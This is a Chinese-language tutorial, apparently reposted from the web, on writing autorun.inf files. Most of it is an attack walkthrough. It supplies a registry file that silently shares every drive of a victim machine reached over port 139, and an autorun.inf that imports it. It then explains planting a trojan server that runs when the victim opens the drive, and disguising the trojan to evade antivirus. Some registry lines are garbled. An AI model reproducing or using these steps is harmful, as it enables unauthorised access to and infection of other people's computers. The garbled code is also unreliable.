app教程网 学习教程 autorun.inf文件如何编写(autorun.inf文件怎么生成)

autorun.inf文件如何编写(autorun.inf文件怎么生成)

最近网上流行通过AutoRun.inf文件让对方所有硬盘完全共享或者得到一个木马。因为AutoRun.inf文件在黑客技术中的应用还比较少,相应的资料也不多,所以很多人对它都觉得很神秘。

本文试图为你解开这个谜团,让你全面了解这项并不复杂却极其有趣的技术。

一、理论基础

经常使用光盘的朋友都知道,很多光盘放入光驱就会自动运行。他们是怎么做到的?光盘一放入光驱,就会自动执行,主要靠两个文件。一个是光盘上的AutoRun.inf文件。

另一个是操作系统本身的系统文件之一Cdvsd.vxd。Cdvsd.vxd会随时检测是否有将光盘放入光驱的动作,如果有,就会开始在光盘根目录下寻找AutoRun.inf文件。

如果有AutoRun.inf文件,则执行其中的预设程序。

AutoRun.inf不仅可以让光盘自动运行程序,还可以让硬盘自动运行程序。方法很简单。首先打开记事本,然后用鼠标右键单击该文件,从弹出菜单中选择重命名,将其重命名为AutoRun.inf。

在AutoRun.inf中键入以下内容:[AutoRun]//表示自动运行部分的开始。

必须输入Icon=C:C.ico//才能给c盘一个个性化的盘符icon C.icoOpen=C:1.exe//要指定要运行的程序的路径和名称,假设文件是为1.exe保存在c盘下,按F5刷新桌面。

看看“我的电脑”里的盘符(这里是c盘),你会发现它的磁盘图标变了。双击进入c盘,c盘下的1.exe文件会自动播放!

解释:“[AutoRun]”行是必要的固定格式,“Icon”行对应的是图标文件,“C:C.ico”是图标文件的路径和文件名。输入图片文件时,您可以将其更改为图片文件的路径和文件名。此外,

".ico”是图标文件的扩展名。如果手头没有这种文件,可以用ACDSee把其他格式的软件转换成ico格式,或者找一个后缀为BMP的文件,直接重命名为ICO文件。

“打开”行指定要自动运行的文件及其驱动器号和路径。特别是,如果你要更改的硬盘和目录中没有自动播放文件,你要删除“打开”行,否则你会因为找不到自动播放文件而无法打开硬盘。

此时只能用鼠标右键点击盘符,在弹出菜单中选择“打开”。

第二,例子

我们举个例子:如果你扫描一台开着139共享的机器,对方只完全共享D盘,我们想共享对方所有的盘。首先编辑注册表文件,打开记事本,并键入以下内容:

REGEDIT4

一定要在这里留一个空行。

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

NetworkLanmanC$]

'ath'='C:'

'Remark'=''

'Type'=dword:00000000

'Flags'=dword:00000302

'armlenc'=hex:

'arm2enc'=hex:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

NetworkLanmanD$]

'ath'='D:'

'Remark'=''

'Type'=dword:00000000

'Flags'=dword:00000302

'armlenc'=hex:

'arm2enc'=hex:

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

NetworkLanmanC$]

'ath'='E:'

'Remark'=''

'Type'=dword:00000000

'Flags'=dword:00000302

'armlenc'=hex:

'arm2enc'=hex:

我只把以上设置为E驱。如果对方有很多逻辑盘符,请自行设置。将以上部分保存为Share.reg文件,以备后用。特别注意REGEDIT4是大写的,写在顶框,然后留一行空白,最后一行记得按一次Enter。

然后打开记事本,编译AutoRun.inf文件,并键入以下内容:

[AutoRun]

Open=regedit/sShare.reg//添加/s参数保存AutoRun.inf文件,导入时不显示任何信息。

将Share.reg和AutoRun.inf这两个文件复制到对方的D盘根目录下,这样对方双击D盘就可以将Share.reg导入到注册表中,对方电脑重启后所有的驱动器就完全共享了。

如果想让对方中了木马,只要把“开放=分享”改成就可以了。Reg”到AutoRun.inf文件中的“Open=木马服务器文件名”。

然后把AutoRun.inf和配置好的木马服务器复制到对方D盘的根目录下,这样对方就不需要运行木马服务器程序了,只要双击D盘就可以让木马运行了!这样做的好处显而易见,

那就是大大的增加了木马运行的主动性!须知许多人现在都是非常警惕的,不熟悉的文件他们轻易的不会运行,而这种方法就很难防范了。

要说明的是,给你下木马的人不会那么蠢的不给木马加以伪装,一般说来,他们会给木马服务端文件改个名字,或好听或和系统文件名很相像,然后给木马换个图标,使它看起来像TXT文件、ZIP文件或图片文件等,

最后修改木马的资源文件使其不被杀毒软件识别(具体的方法可以看网上的文章),当服务端用户信以为真时,木马却悄悄侵入了系统。其实,换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。

以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了!

请大家注意:保存的文件名必须是“AutoRun.inf”,编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步,如果你的某个硬盘内容暂时比较固定的话,

不妨用Flash做一个自动播放文件,再编上“Autorun”文件,那你就有最酷、最个性的硬盘了。

到这儿还没有完。大家知道,在一些光盘放入后,我们在其图标上单击鼠标右键,还会产生一个具有特色的目录菜单,如果能对着我们的硬盘点击鼠标右键也产生这样的效果,那将更加的有特色。其实,

光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句:

shell标志显示的鼠标右键菜单中内容

shell标志command要执行的文件或命令行

所以,要让硬盘具有特色的目录菜单,在AutoRun.inf文件中加入上述语句即可

本文来自网络,不代表本站立场,转载请注明出处:https: